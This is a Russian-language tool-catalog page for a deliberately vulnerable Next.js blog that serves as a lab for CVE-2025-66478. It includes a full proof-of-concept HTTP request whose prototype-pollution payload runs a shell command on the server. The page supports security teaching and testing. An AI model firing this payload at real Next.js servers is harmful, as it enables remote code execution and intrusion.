Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-66478_rce_vulnerable — ВАЖНО: Проект Next JS УЯЗВИМЫЙ создан только для образовательных целей, тестирования и эксплуатации, НЕ РЕКОМЕНДУЕТСЯ УСТАНОВКА В ПРОДУКЦИЮ, ТОЛЬКО ДЛЯ ЛОКАЛЬНОЙ СРЕДЫ ИЛИ КОНТРОЛИРУЕМОЙ СРЕДЫ. | Kitploit
Инструменты/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

ВАЖНО: Проект Next JS УЯЗВИМЫЙ создан только для образовательных целей, тестирования и эксплуатации, НЕ РЕКОМЕНДУЕТСЯ УСТАНОВКА В ПРОДУКЦИЮ, ТОЛЬКО ДЛЯ ЛОКАЛЬНОЙ СРЕДЫ ИЛИ КОНТРОЛИРУЕМОЙ СРЕДЫ.

РепозиторийСайт
42 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Blog Moderno con shadcn/ui

Современный и элегантный блог, построенный на Next.js 16, React 19, shadcn/ui и Tailwind CSS.

ВАЖНО:

Проект УЯЗВИМОГО Next JS, созданный исключительно для образовательных целей, тестирования и эксплуатации, НЕ РЕКОМЕНДУЕТСЯ К УСТАНОВКЕ В ПРОДАКШЕН, ТОЛЬКО ДЛЯ ЛОКАЛЬНОГО ИСПОЛЬЗОВАНИЯ ИЛИ КОНТРОЛИРУЕМОЙ СРЕДЫ.

PoC

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Ссылка: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

Возможности

  • 🎨 Современный дизайн: Элегантный интерфейс на основе shadcn/ui
  • 📝 Полноценный блог: Несколько статей блога с тестовым контентом
  • 💬 Система реакций: Реакции на посты разными эмоциями (like, love, laugh, wow, sad, angry)
  • 👤 Аутентификация: Система регистрации и входа с использованием localStorage
  • 🎯 Адаптивность: Полностью отзывчивый дизайн
  • 🌙 Тёмная тема: Поддержка автоматического тёмного режима

Технологии

  • Next.js 16 — Фреймворк React
  • React 19 — Библиотека UI
  • shadcn/ui — Современные компоненты UI
  • Tailwind CSS 4 — Утилитарные стили
  • TypeScript — Статическая типизация
  • Lucide React — Иконки
  • Radix UI — Доступные компоненты

Установка

  1. Установите зависимости:
npm install
# или
yarn install
# или
pnpm install
  1. Запустите сервер разработки:
npm run dev
# или
yarn dev
# или
pnpm dev
  1. Откройте http://localhost:3000 в вашем браузере.

Структура проекта

├── app/                    # Страницы Next.js
│   ├── blog/[id]/         # Страница деталей блога
│   ├── profile/            # Страница профиля
│   ├── layout.tsx          # Основной layout
│   └── page.tsx            # Главная страница
├── components/             # React-компоненты
│   ├── auth/              # Компоненты аутентификации
│   ├── blog/              # Компоненты блога
│   ├── layout/             # Компоненты макета
│   └── ui/                 # Компоненты shadcn/ui
├── lib/                    # Утилиты и сервисы
│   ├── auth.ts            # Сервис аутентификации
│   ├── mocks.ts           # Тестовые данные
│   └── utils.ts           # Общие утилиты
└── public/                 # Статические файлы

Функциональность

Аутентификация

  • Регистрация новых пользователей
  • Вход в систему
  • Хранение в localStorage
  • Профиль пользователя

Блог

  • Список статей на главной странице
  • Страница деталей для каждой статьи
  • Информация об авторе
  • Категории и теги
  • Изображения на обложке

Реакции

  • Просмотр всех реакций на пост
  • Реакции с разными эмоциями
  • Счётчик реакций по типам
  • Список пользователей, которые отреагировали

Тестовые данные

Все данные (блоги, пользователи, реакции) полностью имитированы и генерируются динамически. База данных не требуется.

Примечания

  • Учётные данные пользователя хранятся в localStorage
  • Данные пересоздаются при каждой перезагрузке страницы
  • Система реакций только визуальная (новые реакции не сохраняются)

Лицензия

Этот проект предназначен только для образовательных целей.

Скачать инструмент